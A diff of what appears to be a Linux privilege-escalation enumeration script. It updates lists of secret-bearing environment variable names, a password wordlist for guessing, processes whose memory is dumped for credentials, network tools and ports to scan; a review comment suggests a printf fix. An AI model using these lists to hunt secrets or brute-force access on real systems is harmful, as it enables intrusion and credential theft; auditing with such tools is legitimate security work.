pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID" 
pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION" 
-pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId" 
+pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|DATABASE_PASSWORD|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId" 
pwd_in_variables5="eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER" 
pwd_in_variables6="GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER" 
pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET" @@ -486,7 +489,7 @@ andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana s plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" PASSTRY="2000" #Default num of passwds to try (all by default) -if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this +if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this SEDOVERFLOW=true for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do wgroups="$wgroups -group $grp -or " 
@@ -521,33 +524,34 @@ notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$| TIMEOUT="$(command -v timeout 2>/dev/null)" STRACE="$(command -v strace 2>/dev/null)" STRINGS="$(command -v strings 2>/dev/null)" +LDD="$(command -v ldd 2>/dev/null)" +READELF="$(command -v readelf 2>/dev/null)" shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" notBackup="/tdbbackup$|/db_hotbackup$" -cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|" +cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|mod-pagespeed|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|" cronjobsB="centreon" 
processesVB='jdwp|tmux |screen | inspect |--inspect[= ]|--inspect$|--inpect-brk|--remote-debugging-port' -processesB="knockd|splunk" +processesB="amazon-ssm-agent|knockd|splunk" processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:" mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier" -profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" +profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|im-config_wayland.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" 
-timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|dpkg-db-backup.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" 
-dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" - 
+dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.intel.tss2.Tabrmd|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|net.hadess.SwitcherooControl|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.nm_priv_helper|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.SystemToolsBackends|org.freedesktop.SystemToolsBackends.[a-zA-Z0-9_]+|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.gnome.DisplayManager|org.opensuse.CupsPkHelper.Mechanism" USEFUL_SOFTWARE="authbind aws base64 ctr curl doas docker fetch g++ gcc gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm" TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." 
GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion" @@ -693,6 +697,7 @@ print_3title(){ } print_3title_no_nl(){ + echo -ne "\033[2K\r" printf ${BLUE}"\r══╣ $GREEN${1}..."$NC #There are 2 "═" } 
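Review bot: The added `echo -ne "\033[2K\r"` in print_3title_no_nl relies on echo options that POSIX leaves unspecified; under dash, for instance, `-ne` is not recognised as an option and is printed literally before the escape sequence (it happens to be wiped by the `[2K` clear, so the glitch is mostly invisible, but the behaviour depends on which sh runs the script). The following line already uses printf for the same purpose, so the clear-line sequence can be emitted the same dependable way: `printf '\033[2K\r'`. This is byte-identical under bash and removes the shell-specific echo behaviour.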
@@ -859,7 +864,7 @@ tcp_port_scan (){ if [ -z "$PORTS" ]; then printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " printf "$NC\n" - PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 
2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 